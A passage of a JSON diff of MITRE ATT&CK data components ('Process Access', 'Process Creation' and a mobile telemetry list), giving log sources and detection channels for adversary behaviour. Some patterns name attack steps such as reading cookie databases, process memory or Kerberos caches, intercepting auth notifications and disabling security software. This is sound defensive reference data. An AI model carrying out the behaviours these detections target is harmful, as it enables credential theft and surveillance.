+                            "channel": "enumeratorForContainerItemIdentifier / itemForIdentifier across multiple containers/providers"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "wifiservice startScan / scanResults retrieved repeatedly or by unexpected package"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "bluetoothmanager startDiscovery / getBondedDevices / scan callback bursts by package"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "telephony cell info enumeration bursts (neighboring/all cell info) by package"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "repeated queries or dumps related to running tasks/services/process state by same package/UID (e.g., getRunningAppProcesses, running services/task inspection)"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Application accesses android.os.Build fields or device configuration APIs (MODEL, MANUFACTURER, VERSION.SDK_INT, HARDWARE)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Application invokes UIDevice queries (model, systemVersion, name)"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Invocation of MediaRecorder.start(), AudioRecord.startRecording(), or VOICE_CALL audio source"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Invocation of AVAudioRecorder, AVCaptureSession, or related audio capture framework calls"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Application invokes LocationManager, FusedLocationProviderClient, or GPS/location sensor APIs"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Application activates CoreLocation services or CLLocationManager APIs"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Framework-based networking usage spikes or uncommon networking stacks observed by agent telemetry (e.g., repeated URLSession/OkHttp-like patterns) without corresponding foreground/user interaction"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Agent-observable telephony subscription/state API signals indicating SIM/eSIM subscription change (vendor-agnostic: 'telephony subscription changed')"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Accessibility framework usage patterns such as event subscription, performAction invocation, node traversal, text change observation, or overlay/window presentation correlated to app identity"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Browser/WebView framework usage indicating external URL load, script execution enablement, file download initiation, intent handoff, or package install prompt sequence"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Observed device-service, trust-service, backup/service interaction, or other privileged framework activity associated with physical host access"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Connectivity manager, telephony, Wi-Fi, network callback, or location-provider framework reports repeated unavailable, disconnected, suspended, or degraded state transitions"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Observed network-path, reachability, DNS, transport, or location-provider framework reports repeated unavailable or failed state near active device use"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Content resolver, document provider, media store, storage access framework, bulk stream processing, or repeated crypto-adjacent framework use observed during multi-file transformation"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Known application begins first-seen or expanded use of content providers, account services, accessibility, package services, cryptographic routines, dynamic loading, or other framework interactions after update/install"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Known application begins first-seen or expanded use of protected frameworks, account services, background task APIs, crypto/network service APIs, or other runtime behaviors after update/install"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Known application begins first-seen or expanded use of account services, accessibility, content providers, dynamic loading, package services, WebView bridges, crypto/network APIs, or advertising/telemetry-adjacent framework behavior after install or update"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Privileged or OEM-context framework/API use tied to telephony, device policy, accessibility, overlay, input injection, package visibility, or protected settings modification from an identity not expected for the device model or approved image"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Invocation of Calendar.set() and Calendar.add()"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Supplemental anomaly in baseband, IOKit, accessory, security, or activation-related subsystem logging temporally adjacent to suspicious posture or network behavior"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Recently installed or updated trusted app invokes Android framework paths or special access patterns inconsistent with its role, including accessibility-like behavior, overlay behavior, package visibility expansion, protected settings access, device policy interaction, or unusual IPC/provider access"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Supplemental managed app or system subsystem anomalies near install/update, launch services, extension handling, app activation, or background execution temporally adjacent to suspicious network or lifecycle behavior"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App uses Android framework behaviors associated with background work scheduling, network job execution, IPC/provider access, overlay or accessibility-like interaction, or unusual package visibility immediately adjacent to web-service communication"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Supplemental launch, background task, networking, or extension-handling anomalies occur temporally adjacent to suspicious web-service communication from a managed app or supervised device"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Background work scheduler, job execution, or persistent service triggered network request to public web-service followed by second outbound connection within TimeWindow"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Background task or networking subsystem event occurred immediately before resolver retrieval and pivot connection sequence"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded retrieve-then-write exchange with public web-service platform"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Background task, networking, or app-activation subsystem event occurred immediately before or during retrieve-then-write exchange with public web-service platform"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded outbound session using non-standard protocol-to-port pairing"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Invocation of CallLogs.getLastOutgoingCall()"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Invocation of ContactsContract.Contacts.getLookupUri() and/or ContactsContract.Contacts.lookupContact()"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Camera, media capture, app-activation, or background-task subsystem event occurred immediately before or during sustained camera session from same managed-app or device context"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Invocation of AccountManager.getAccounts()"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "MediaProjection-style screen capture session began from app identity while a different app was foregrounded and capture path was not mapped to approved recording workflow"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Accessibility-service activity from app identity coincided with foreground content observation and subsequent screenshot, frame buffer, or screenrecord artifact behavior within TimeWindow"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Privileged screencap, screenrecord, adb-driven capture, or root-context screen acquisition behavior occurred from app, shell, or elevated identity while foreground app context changed or sensitive app remained active"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Accessibility-enabled app invoked programmatic click or action on behalf of user while a different app was foregrounded and injected action was not mapped to approved accessibility or autofill workflow"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Accessibility-enabled app invoked global action such as back, home, recents, or navigation control while target foreground app context changed within TimeWindow"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Accessibility-enabled app inserted text into active field of different foreground app without user keyboard activity or approved autofill relationship"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App intercepts notification content from external package (e.g., messaging/auth apps) while in background OR without recent user interaction"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App invokes cryptographic functions (e.g., AES/RSA/KeyStore usage) on buffer data followed by encode/transform operations not tied to normal app workflows"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App invokes symmetric encryption routines (e.g., AES/RC4 cipher initialization + encrypt operations) with repeated key usage across multiple data buffers"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Symmetric key material reused across multiple encryption operations within short interval OR derived locally without secure hardware-backed storage"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App invokes asymmetric cryptographic operations (e.g., RSA/ECC keypair generation OR public key encryption OR signature operations) on outbound data buffers"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Keypair generation, import, or access events (public/private key usage) occurring prior to network communication"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes custom TLS trust evaluation logic or pin validation routines (e.g., custom TrustManager, HostnameVerifier override, certificate/public key comparison) immediately before outbound TLS session establishment"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes archive, compression, or bulk-buffer packaging routines on previously accessed local data within the same execution chain"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application encrypts newly created archive or staged data blob after collection and before storage or outbound transfer"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application performs bulk data transformation or packaging-like processing on collected records prior to file creation or upload"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application queries or opens multiple local SQLite or app-associated database stores containing records unrelated to the app's declared function during the collection phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application performs repeated record access, container traversal, or local data extraction processing against local stores before staging or transmission"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application calls startForegroundService() or startForeground() / ServiceCompat.startForeground() and transitions to persistent foreground-service execution at the start of the chain"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes direct file retrieval, DownloadManager usage, or streaming write from network response to local storage immediately after remote session establishment"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Managed app performs post-download unpacking, dynamic resource handling, or module preparation immediately after local payload creation"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application loads or resolves native shared library (.so) or JNI bridge immediately before suspicious native execution phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application transitions from managed code into JNI/native function execution or attaches native thread to runtime during the execution phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Existing application is replaced, updated, or reinstalled and the resulting package metadata, code sections, or executable-supporting artifacts diverge from known-good baseline during the persistence-establishment phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes SMS send, intercept, delete, or provider-write behavior, including handling SMS_DELIVER or interacting with SMS content provider during unauthorized message-control phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application enqueues WorkManager work request or schedules JobScheduler or AlarmManager task with delay, periodic interval, or execution constraints during the persistence/execution setup phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application creates or executes NSBackgroundActivityScheduler activity with repeating or deferred invocation semantics during the scheduling and trigger phases"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application initializes proxy-capable or raw-socket networking constructs, including SOCKS-capable Proxy API usage or direct socket listener/setup immediately before traffic relay phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes call placement, answer, redirect, block, screening, or ConnectionService call-handling APIs during unauthorized call-control phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application process loads external code modules or injects into runtime (zygote/app_process) + abnormal library loading or method interception behavior"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application registers broadcast receiver, WorkManager job, JobScheduler task, or intent filter tied to system event such as BOOT_COMPLETED, SMS_RECEIVED, CONNECTIVITY_CHANGE during persistence setup phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application registers or invokes broadcast receiver via registerReceiver() or manifest-declared receiver + intent filter tied to system or app events"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application launches or executes code where loaded library or component path does not match application package path or expected signing context"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "multiple applications invoking core system APIs (e.g., sensor, permission, telephony) with abnormal or inconsistent return values across apps within short interval"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "device integrity degradation + root detected or system partition modification affecting runtime libraries (e.g., /system/lib*, /vendor/lib*)"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes privileged framework APIs (Accessibility events, UI automation, package install flows) immediately following permission grant"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes DevicePolicyManager APIs (e.g., resetPassword, lockNow, setCameraDisabled) immediately following admin activation"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application queries target-selection attributes (e.g., location, SIM/operator, locale, device state, network identity) and then conditionally invokes sensitive framework APIs only after expected value is observed"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application exhibits repeated environment-context evaluation followed by delayed privileged framework use only after target-specific match"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes geolocation or geofencing framework operations (e.g., location polling or geofence registration/evaluation) and sensitive framework activity begins only after region match or location threshold condition"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application exhibits repeated location-context evaluation followed by delayed privileged framework use or feature activation only after target region match"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes package or component state changes affecting launcher-facing activity availability and subsequently continues operational framework activity after icon suppression"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes motion-sensor or device-activity framework operations followed by conditional execution of sensitive framework activity only after inferred user absence"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes system framework operations that alter monitoring, accessibility, or execution visibility followed by reduction in expected telemetry generation"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes accessibility global actions (back/home/recents) or observes package-management UI immediately after uninstall/settings screen becomes foreground"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes lock-related or UI-denial framework operations, including DevicePolicyManager lock actions, persistent overlay behavior, or accessibility-driven navigation interference immediately before device enters locked or unusable state"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes package, settings, or privileged framework operations capable of disabling security software, altering security enforcement, or interfering with reporting before telemetry loss"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes uninstall-related package-management operations, accessibility-driven uninstall confirmation actions, or privileged file-removal operations immediately before installed-state loss"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes file-management, package, storage, or administrative wipe operations immediately before loss of expected local files or file collections"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "mobile-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.775000+00:00\", \"old_value\": \"2026-04-23 18:22:40.476000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.272000+00:00",
+                    "modified": "2026-05-12 15:12:00.770000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0035",
+                            "external_id": "DC0035"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Process Access",
+                    "description": "Refers to an event where one process attempts to open another process, typically to inspect or manipulate its memory, access handles, or modify execution flow. Monitoring these access attempts can provide valuable insight into both benign and malicious behaviors, such as debugging, inter-process communication (IPC), or process injection.\n\n*Data Collection Measures:*\n\n- Endpoint Detection and Response (EDR) Tools:\n    -  EDR solutions that provide telemetry on inter-process access and memory manipulation.\n- Sysmon (Windows):\n    - Event ID 10: Captures process access attempts, including:\n        - Source process (initiator)\n        - Target process (victim)\n        - Access rights requested\n        - Process ID correlation\n- Windows Event Logs:\n    - Event ID 4656 (Audit Handle to an Object): Logs access attempts to system objects.\n    - Event ID 4690 (Attempted Process Modification): Can help identify unauthorized process changes.\n- Linux/macOS Monitoring:\n    - AuditD: Monitors process access through syscall tracing (e.g., `ptrace`, `open`, `read`, `write`).\n    - eBPF/XDP: Used for low-level monitoring of kernel process access.\n    - OSQuery: Query process access behavior via structured SQL-like logging.\n- Procmon (Process Monitor) and Debugging Tools:\n    - Windows Procmon: Captures real-time process interactions.\n    - Linux strace / ptrace: Useful for tracking process behavior at the system call level.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=10"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Process State"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "ptrace attach"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "ptrace or task_for_pid"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process_open"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "High frequency of accept(), read(), or SSL_read() syscalls tied to nginx/apache processes"
+                        },
+                        {
+                            "name": "Apple TCC Logs",
+                            "channel": "Microphone Access Events"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "ptrace"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "syscalls (open, read, ioctl) on /dev/input or /proc/*/fd/*"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=25"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_OPEN"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected NSXPCConnection calls by non-Apple-signed or abnormal binaries"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4663, 4670, 4656"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unusual Mach port registration or access attempts between unrelated processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem=com.apple.security, library=libsystem_kernel.dylib"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "ptrace syscall or access to /proc/*/mem"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "vm_read, task_for_pid, or file open to cookie databases"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "process_events"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "ACCESS"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve, fork, mmap, ptrace"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "ptrace or process_vm_readv"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "unexpected memory inspection"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Code signing validation events referencing newly written local Mach-O/bundle prior to exec or dlopen"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Runtime grant or manifest presence for MANAGE_EXTERNAL_STORAGE/READ_EXTERNAL_STORAGE/READ_MEDIA_*; legacy external storage mode detection"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Privacy (TCC) prompts/grants for Photos/Files or access changes indicating new visibility into user/app data"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Activity/Process state change (mFocusedApp, onResume/onPause) identifying <pkg> as foreground"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Foreground/background transition for <bundle_id> to contextualize access timing"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Grant/activation of BIND_ACCESSIBILITY_SERVICE, BIND_INPUT_METHOD, SYSTEM_ALERT_WINDOW, POST_NOTIFICATIONS for <pkg>"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Keyboard extension Full Access change; privacy grant touching input/keyboard categories for <bundle_id>"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Grant/enablement for BIND_ACCESSIBILITY_SERVICE or BIND_INPUT_METHOD for <pkg>"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Keyboard extension Full Access change or related privacy grant for <bundle_id>"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Grant/enablement of SYSTEM_ALERT_WINDOW, BIND_ACCESSIBILITY_SERVICE, POST_NOTIFICATIONS for <pkg>"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Scene/foreground transitions for <bundle_id> to contextualize timing"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Reads/queries ops for PACKAGE_USAGE_STATS, QUERY_ALL_PACKAGES, BIND_DEVICE_ADMIN, BIND_VPN_SERVICE"
+                        },
+                        {
+                            "name": "EDR:telemetry",
+                            "channel": "Sustained or high-frequency location sensor access, including background location usage"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.770000+00:00\", \"old_value\": \"2026-02-23 18:45:08.713000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0035\", \"old_value\": \"https://attack.mitre.org/data-components/DC0035\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.272000+00:00",
+                    "modified": "2026-05-12 15:12:00.773000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0032",
+                            "external_id": "DC0032"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Process Creation",
+                    "description": "Refers to the event in which a new process (executable) is initialized by an operating system. This can involve parent-child process relationships, process arguments, and environmental variables. Monitoring process creation is crucial for detecting malicious behaviors, such as execution of unauthorized binaries, scripting abuse, or privilege escalation attempts.. ",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Process",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream 'eventMessage contains pubsub or broker'"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=1"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Execution of binary resolved from $PATH not located in /usr/bin or /bin"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process execution path inconsistent with baseline PATH directories"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4688"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "process_events"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "exec"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of launchctl with suspicious arguments"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve network tools"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process_events"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve calls to soffice.bin with suspicious macro execution flags"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process execution of Microsoft Word, Excel, PowerPoint with macro execution attempts"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process reading browser configuration paths"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec logs"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execve: Processes launched with LD_PRELOAD/LD_LIBRARY_PATH pointing to non-system dirs"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "exec: Process execution context for loaders calling dlopen/dlsym"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "EXECVE"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execution of unexpected binaries during user shell startup"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launch of Terminal.app or shell with non-standard environment setup"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC with unusual parent-child process relationships from zsh"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of systemctl or service stop"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of launchctl or pkill"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process::exec"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of klist, kinit, or tools interacting with ccache outside normal user context"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Execution of non-standard binaries accessing Kerberos APIs"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Electron-based binary spawning shell or script interpreter"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Electron app spawning unexpected child process"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "/root/.ash_history or /etc/init.d/*"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve calls with high-frequency or known bandwidth-intensive tools"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec or spawn calls to proxy tools or torrent clients"
+                        },
+                        {
+                            "name": "containers:osquery",
+                            "channel": "bandwidth-intensive command execution from within a container namespace"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process launch"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream --info --predicate 'subsystem == \"com.apple.cfprefsd\"'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of security, sqlite3, or unauthorized binaries"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected applications generating outbound DNS queries"
+                        },
+                        {
+                            "name": "linux:Sysmon",
+                            "channel": "EventCode=1"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "execve"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected child process of Safari or Chrome"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve or syscall invoking vm artifact check commands (e.g., dmidecode, lspci, dmesg)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of system_profiler, ioreg, kextstat with argument patterns related to VM/sandbox checks"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process writes or modifies files in excluded paths"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "com.apple.mail.* exec.*"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of memory inspection tools (lldb, gdb, osqueryi)"
+                        },
+                        {
+                            "name": "esxi:vobd",
+                            "channel": "/var/log/vobd.log"
+                        },
+                        {
+                            "name": "kubernetes:apiserver",
+                            "channel": "kubectl exec or kubelet API calls targeting running pods"
+                        },
+                        {
+                            "name": "docker:audit",
+                            "channel": "Process execution events within container namespace context"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "process persists beyond parent shell termination"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "background process persists beyond user logout"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of scripts or binaries sourced from mail directories (/var/mail, ~/Maildir)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Preview.app, Safari.app, or Mail.app spawning new processes outside normal patterns"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "process execution across cloud VM"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "systemctl spawning managed processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "/var/log/shell.log"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of processes linked to hijacked sessions (e.g., anomalous parent-child process lineage)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec events where web process starts a shell/tooling"
+                        },
+                        {
+                            "name": "docker:events",
